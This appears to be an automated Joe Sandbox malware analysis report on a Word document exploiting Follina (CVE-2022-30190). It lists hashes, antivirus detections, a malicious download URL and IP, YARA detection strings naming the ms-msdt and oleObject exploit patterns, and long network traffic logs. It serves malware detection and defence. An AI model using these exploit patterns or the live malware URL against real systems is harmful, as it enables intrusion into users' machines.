Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
3BgX69C870

Overview

General Information

Sample Name:3BgX69C870 (renamed file extension from none to docx)
Analysis ID:686208
MD5:d805b55d60f9ca73ae71ed68ff692175
SHA1:947691dbba33dfeb974babcb43d3ceb7991dae29
SHA256:6a0acf2389d95abc590c8b6a327521312c4de176efce271468817c840745a096
Tags:docx
Infos:

Detection

Follina CVE-2022-30190
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected Microsoft Office Exploit Follina CVE-2022-30190
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Antivirus detection for dropped file
Snort IDS alert for network traffic
Contains an external reference to another file
Detected suspicious Microsoft Office reference URL
Yara signature match
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Uses insecure TLS / SSL version for HTTPS connection
Document misses a certain OLE stream usually present in this Microsoft Office document type

Classification

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 1448 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
document.xml.relsSUSP_Doc_WordXMLRels_May22Detects a suspicious pattern in docx document.xml.rels file as seen in CVE-2022-30190 / Follina exploitationTobias Michalski, Christian Burkard, Wojciech Cieslak
  • 0x39:$a1: <Relationships
  • 0x3b5:$a2: TargetMode="External"
  • 0x3ad:$x1: .html!
document.xml.relsINDICATOR_OLE_RemoteTemplateDetects XML relations where an OLE object is refrencing an external target in dropper OOXML documentsditekSHen
  • 0x375:$olerel: relationships/oleObject
  • 0x38e:$target1: Target="http
  • 0x3b5:$mode: TargetMode="External

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapSUSP_PS1_Msdt_Execution_May22Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitationNasreddine Bencherchali, Christian Burkard
  • 0x535f:$a: PCWDiagnostic
  • 0x5353:$sa3: ms-msdt
  • 0x53b6:$sb3: IT_BrowseForFile=
sslproxydump.pcapEXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitationTobias Michalski, Christian Burkard
  • 0x5342:$re1: location.href = "ms-msdt:
sslproxydump.pcapJoeSecurity_FollinaYara detected Microsoft Office Exploit Follina / CVE-2022-30190Joe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\index[1].htmSUSP_PS1_Msdt_Execution_May22Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitationNasreddine Bencherchali, Christian Burkard
    • 0x23f7:$a: PCWDiagnostic
    • 0x23eb:$sa3: ms-msdt
    • 0x244e:$sb3: IT_BrowseForFile=
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\index[1].htmEXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitationTobias Michalski, Christian Burkard
    • 0x23da:$re1: location.href = "ms-msdt:
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\index[1].htmJoeSecurity_FollinaYara detected Microsoft Office Exploit Follina / CVE-2022-30190Joe Security
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\951D3BEA.htmSUSP_PS1_Msdt_Execution_May22Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitationNasreddine Bencherchali, Christian Burkard
      • 0x23f7:$a: PCWDiagnostic
      • 0x23eb:$sa3: ms-msdt
      • 0x244e:$sb3: IT_BrowseForFile=
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\951D3BEA.htmEXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitationTobias Michalski, Christian Burkard
      • 0x23da:$re1: location.href = "ms-msdt:
      Click to see the 4 entries

      Sigma Signatures

      No Sigma rule has matched

      Snort Signatures

      Timestamp:192.168.2.228.8.8.855275532027758 08/18/22-10:45:08.539171
      SID:2027758
      Source Port:55275
      Destination Port:53
      Protocol:UDP
      Classtype:Potentially Bad Traffic
      Timestamp:192.168.2.228.8.8.849688532027758 08/18/22-10:45:02.957827
      SID:2027758
      Source Port:49688
      Destination Port:53
      Protocol:UDP
      Classtype:Potentially Bad Traffic
      Timestamp:192.168.2.228.8.8.858836532027758 08/18/22-10:45:02.979786
      SID:2027758
      Source Port:58836
      Destination Port:53
      Protocol:UDP
      Classtype:Potentially Bad Traffic
      Timestamp:192.168.2.228.8.8.859915532027758 08/18/22-10:45:11.469767
      SID:2027758
      Source Port:59915
      Destination Port:53
      Protocol:UDP
      Classtype:Potentially Bad Traffic
      Timestamp:192.168.2.228.8.8.855868532027758 08/18/22-10:44:56.070010
      SID:2027758
      Source Port:55868
      Destination Port:53
      Protocol:UDP
      Classtype:Potentially Bad Traffic
      Timestamp:192.168.2.228.8.8.854408532027758 08/18/22-10:45:11.508650
      SID:2027758
      Source Port:54408
      Destination Port:53
      Protocol:UDP
      Classtype:Potentially Bad Traffic
      Timestamp:192.168.2.228.8.8.850134532027758 08/18/22-10:45:08.507639
      SID:2027758
      Source Port:50134
      Destination Port:53
      Protocol:UDP
      Classtype:Potentially Bad Traffic

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Antivirus / Scanner detection for submitted sample
      Source: 3BgX69C870.docxAvira: detected
      Multi AV Scanner detection for submitted file
      Source: 3BgX69C870.docxMetadefender: Detection: 20%Perma Link
      Source: 3BgX69C870.docxReversingLabs: Detection: 65%
      Antivirus detection for URL or domain
      Source: https://ascota.cc/index.htmlAvira URL Cloud: Label: malware
      Source: https://ascota.cc/index.htmlyXAvira URL Cloud: Label: malware
      Antivirus detection for dropped file
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\index[1].htmAvira: detection malicious, Label: JS/CVE-2022-30190.G
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\951D3BEA.htmAvira: detection malicious, Label: JS/CVE-2022-30190.G
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DB03D47C.htmAvira: detection malicious, Label: JS/CVE-2022-30190.G

      Exploits

      barindex
      Yara detected Microsoft Office Exploit Follina CVE-2022-30190
      Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
      Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\index[1].htm, type: DROPPED
      Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\951D3BEA.htm, type: DROPPED
      Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DB03D47C.htm, type: DROPPED
      Detected suspicious Microsoft Office reference URL
      Source: document.xml.relsExtracted files from sample: https://ascota.cc/index.html!
      Source: unknownHTTPS traffic detected: 50.31.246.2:443 -> 192.168.2.22:49172 version: TLS 1.0
      Source: unknownHTTPS traffic detected: 50.31.246.2:443 -> 192.168.2.22:49173 version: TLS 1.0
      Source: unknownHTTPS traffic detected: 50.31.246.2:443 -> 192.168.2.22:49181 version: TLS 1.0
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
      Source: unknownHTTPS traffic detected: 50.31.246.2:443 -> 192.168.2.22:49171 version: TLS 1.2
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 50.31.246.2:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 50.31.246.2:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 50.31.246.2:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 50.31.246.2:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 50.31.246.2:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 50.31.246.2:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 50.31.246.2:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 50.31.246.2:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 50.31.246.2:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 50.31.246.2:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 50.31.246.2:443 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 50.31.246.2:443 -> 192.168.2.22:49172
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 50.31.246.2:443 -> 192.168.2.22:49172
      Source: global trafficTCP traffic: 50.31.246.2:443 -> 192.168.2.22:49172
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 50.31.246.2:443 -> 192.168.2.22:49172
      Source: global trafficTCP traffic: 50.31.246.2:443 -> 192.168.2.22:49172
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 50.31.246.2:443 -> 192.168.2.22:49172
      Source: global trafficTCP traffic: 50.31.246.2:443 -> 192.168.2.22:49172
      Source: global trafficTCP traffic: 50.31.246.2:443 -> 192.168.2.22:49172
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 50.31.246.2:443 -> 192.168.2.22:49172
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 50.31.246.2:443 -> 192.168.2.22:49172
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 50.31.246.2:443 -> 192.168.2.22:49173
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 50.31.246.2:443 -> 192.168.2.22:49173
      Source: global trafficTCP traffic: 50.31.246.2:443 -> 192.168.2.22:49173
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 50.31.246.2:443 -> 192.168.2.22:49173
      Source: global trafficTCP traffic: 50.31.246.2:443 -> 192.168.2.22:49173
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 50.31.246.2:443 -> 192.168.2.22:49173
      Source: global trafficTCP traffic: 50.31.246.2:443 -> 192.168.2.22:49173
      Source: global trafficTCP traffic: 50.31.246.2:443 -> 192.168.2.22:49173
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 50.31.246.2:443 -> 192.168.2.22:49173
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 50.31.246.2:443 -> 192.168.2.22:49173
      Source: global trafficTCP traffic: 192.168.2.22:49174 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 50.31.246.2:443 -> 192.168.2.22:49174
      Source: global trafficTCP traffic: 192.168.2.22:49174 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49174 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 50.31.246.2:443 -> 192.168.2.22:49174
      Source: global trafficTCP traffic: 50.31.246.2:443 -> 192.168.2.22:49174
      Source: global trafficTCP traffic: 192.168.2.22:49174 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 50.31.246.2:443 -> 192.168.2.22:49174
      Source: global trafficTCP traffic: 192.168.2.22:49174 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 50.31.246.2:443 -> 192.168.2.22:49174
      Source: global trafficTCP traffic: 50.31.246.2:443 -> 192.168.2.22:49174
      Source: global trafficTCP traffic: 50.31.246.2:443 -> 192.168.2.22:49174
      Source: global trafficTCP traffic: 192.168.2.22:49174 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49174 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 50.31.246.2:443 -> 192.168.2.22:49174
      Source: global trafficTCP traffic: 192.168.2.22:49175 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 50.31.246.2:443 -> 192.168.2.22:49175
      Source: global trafficTCP traffic: 192.168.2.22:49175 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49175 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 50.31.246.2:443 -> 192.168.2.22:49175
      Source: global trafficTCP traffic: 50.31.246.2:443 -> 192.168.2.22:49175
      Source: global trafficTCP traffic: 192.168.2.22:49175 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 50.31.246.2:443 -> 192.168.2.22:49175
      Source: global trafficTCP traffic: 192.168.2.22:49175 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 50.31.246.2:443 -> 192.168.2.22:49175
      Source: global trafficTCP traffic: 50.31.246.2:443 -> 192.168.2.22:49175
      Source: global trafficTCP traffic: 50.31.246.2:443 -> 192.168.2.22:49175
      Source: global trafficTCP traffic: 192.168.2.22:49175 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49175 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 50.31.246.2:443 -> 192.168.2.22:49175
      Source: global trafficTCP traffic: 192.168.2.22:49176 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 50.31.246.2:443 -> 192.168.2.22:49176
      Source: global trafficTCP traffic: 192.168.2.22:49176 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49176 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 50.31.246.2:443 -> 192.168.2.22:49176
      Source: global trafficTCP traffic: 50.31.246.2:443 -> 192.168.2.22:49176
      Source: global trafficTCP traffic: 192.168.2.22:49176 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 50.31.246.2:443 -> 192.168.2.22:49176
      Source: global trafficTCP traffic: 192.168.2.22:49176 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 50.31.246.2:443 -> 192.168.2.22:49176
      Source: global trafficTCP traffic: 50.31.246.2:443 -> 192.168.2.22:49176
      Source: global trafficTCP traffic: 50.31.246.2:443 -> 192.168.2.22:49176
      Source: global trafficTCP traffic: 192.168.2.22:49176 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49176 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 50.31.246.2:443 -> 192.168.2.22:49176
      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 50.31.246.2:443 -> 192.168.2.22:49177
      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 50.31.246.2:443 -> 192.168.2.22:49177
      Source: global trafficTCP traffic: 50.31.246.2:443 -> 192.168.2.22:49177
      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 50.31.246.2:443 -> 192.168.2.22:49177
      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 50.31.246.2:443 -> 192.168.2.22:49177
      Source: global trafficTCP traffic: 50.31.246.2:443 -> 192.168.2.22:49177
      Source: global trafficTCP traffic: 50.31.246.2:443 -> 192.168.2.22:49177
      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 50.31.246.2:443 -> 192.168.2.22:49177
      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 50.31.246.2:443 -> 192.168.2.22:49177
      Source: global trafficTCP traffic: 50.31.246.2:443 -> 192.168.2.22:49177
      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 50.31.246.2:443 -> 192.168.2.22:49177
      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 50.31.246.2:443 -> 192.168.2.22:49177
      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 50.31.246.2:443 -> 192.168.2.22:49177
      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 50.31.246.2:443 -> 192.168.2.22:49177
      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49178 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 50.31.246.2:443 -> 192.168.2.22:49178
      Source: global trafficTCP traffic: 192.168.2.22:49178 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49178 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 50.31.246.2:443 -> 192.168.2.22:49178
      Source: global trafficTCP traffic: 50.31.246.2:443 -> 192.168.2.22:49178
      Source: global trafficTCP traffic: 192.168.2.22:49178 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49178 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 50.31.246.2:443 -> 192.168.2.22:49178
      Source: global trafficTCP traffic: 192.168.2.22:49178 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 50.31.246.2:443 -> 192.168.2.22:49178
      Source: global trafficTCP traffic: 50.31.246.2:443 -> 192.168.2.22:49178
      Source: global trafficTCP traffic: 50.31.246.2:443 -> 192.168.2.22:49178
      Source: global trafficTCP traffic: 192.168.2.22:49178 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49178 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49178 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 50.31.246.2:443 -> 192.168.2.22:49178
      Source: global trafficTCP traffic: 192.168.2.22:49178 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49178 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 50.31.246.2:443 -> 192.168.2.22:49179
      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 50.31.246.2:443 -> 192.168.2.22:49179
      Source: global trafficTCP traffic: 50.31.246.2:443 -> 192.168.2.22:49179
      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 50.31.246.2:443 -> 192.168.2.22:49179
      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 50.31.246.2:443 -> 192.168.2.22:49179
      Source: global trafficTCP traffic: 50.31.246.2:443 -> 192.168.2.22:49179
      Source: global trafficTCP traffic: 50.31.246.2:443 -> 192.168.2.22:49179
      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 50.31.246.2:443 -> 192.168.2.22:49179
      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49180 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 50.31.246.2:443 -> 192.168.2.22:49180
      Source: global trafficTCP traffic: 192.168.2.22:49180 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49180 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 50.31.246.2:443 -> 192.168.2.22:49180
      Source: global trafficTCP traffic: 50.31.246.2:443 -> 192.168.2.22:49180
      Source: global trafficTCP traffic: 192.168.2.22:49180 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49180 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 50.31.246.2:443 -> 192.168.2.22:49180
      Source: global trafficTCP traffic: 192.168.2.22:49180 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 50.31.246.2:443 -> 192.168.2.22:49180
      Source: global trafficTCP traffic: 50.31.246.2:443 -> 192.168.2.22:49180
      Source: global trafficTCP traffic: 192.168.2.22:49180 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 50.31.246.2:443 -> 192.168.2.22:49180
      Source: global trafficTCP traffic: 192.168.2.22:49180 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49180 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49180 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49181 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 50.31.246.2:443 -> 192.168.2.22:49181
      Source: global trafficTCP traffic: 192.168.2.22:49181 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49181 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 50.31.246.2:443 -> 192.168.2.22:49181
      Source: global trafficTCP traffic: 50.31.246.2:443 -> 192.168.2.22:49181
      Source: global trafficTCP traffic: 192.168.2.22:49181 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49181 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 50.31.246.2:443 -> 192.168.2.22:49181
      Source: global trafficTCP traffic: 50.31.246.2:443 -> 192.168.2.22:49181
      Source: global trafficTCP traffic: 192.168.2.22:49181 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 50.31.246.2:443 -> 192.168.2.22:49181
      Source: global trafficTCP traffic: 50.31.246.2:443 -> 192.168.2.22:49181
      Source: global trafficTCP traffic: 50.31.246.2:443 -> 192.168.2.22:49181
      Source: global trafficTCP traffic: 192.168.2.22:49181 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49181 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 50.31.246.2:443 -> 192.168.2.22:49181
      Source: global trafficTCP traffic: 192.168.2.22:49182 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 50.31.246.2:443 -> 192.168.2.22:49182
      Source: global trafficTCP traffic: 192.168.2.22:49182 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49182 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 50.31.246.2:443 -> 192.168.2.22:49182
      Source: global trafficTCP traffic: 50.31.246.2:443 -> 192.168.2.22:49182
      Source: global trafficTCP traffic: 192.168.2.22:49182 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49182 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 50.31.246.2:443 -> 192.168.2.22:49182
      Source: global trafficTCP traffic: 192.168.2.22:49182 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 50.31.246.2:443 -> 192.168.2.22:49182
      Source: global trafficTCP traffic: 50.31.246.2:443 -> 192.168.2.22:49182
      Source: global trafficTCP traffic: 50.31.246.2:443 -> 192.168.2.22:49182
      Source: global trafficTCP traffic: 192.168.2.22:49182 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49182 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49182 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 50.31.246.2:443 -> 192.168.2.22:49182
      Source: global trafficTCP traffic: 192.168.2.22:49182 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49182 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49183 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 50.31.246.2:443 -> 192.168.2.22:49183
      Source: global trafficTCP traffic: 192.168.2.22:49183 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49183 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 50.31.246.2:443 -> 192.168.2.22:49183
      Source: global trafficTCP traffic: 50.31.246.2:443 -> 192.168.2.22:49183
      Source: global trafficTCP traffic: 192.168.2.22:49183 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49183 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 50.31.246.2:443 -> 192.168.2.22:49183
      Source: global trafficTCP traffic: 192.168.2.22:49183 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 50.31.246.2:443 -> 192.168.2.22:49183
      Source: global trafficTCP traffic: 50.31.246.2:443 -> 192.168.2.22:49183
      Source: global trafficTCP traffic: 192.168.2.22:49183 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 50.31.246.2:443 -> 192.168.2.22:49183
      Source: global trafficTCP traffic: 50.31.246.2:443 -> 192.168.2.22:49183
      Source: global trafficTCP traffic: 192.168.2.22:49183 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49183 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49183 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 50.31.246.2:443 -> 192.168.2.22:49183
      Source: global trafficTCP traffic: 192.168.2.22:49183 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49183 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49184 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 50.31.246.2:443 -> 192.168.2.22:49184
      Source: global trafficTCP traffic: 192.168.2.22:49184 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49184 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 50.31.246.2:443 -> 192.168.2.22:49184
      Source: global trafficTCP traffic: 50.31.246.2:443 -> 192.168.2.22:49184
      Source: global trafficTCP traffic: 192.168.2.22:49184 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49184 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 50.31.246.2:443 -> 192.168.2.22:49184
      Source: global trafficTCP traffic: 192.168.2.22:49184 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 50.31.246.2:443 -> 192.168.2.22:49184
      Source: global trafficTCP traffic: 50.31.246.2:443 -> 192.168.2.22:49184
      Source: global trafficTCP traffic: 50.31.246.2:443 -> 192.168.2.22:49184
      Source: global trafficTCP traffic: 192.168.2.22:49184 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49184 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49184 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 50.31.246.2:443 -> 192.168.2.22:49184
      Source: global trafficTCP traffic: 192.168.2.22:49184 -> 50.31.246.2:443
      Source: global trafficTCP traffic: 192.168.2.22:49184 -> 50.31.246.2:443
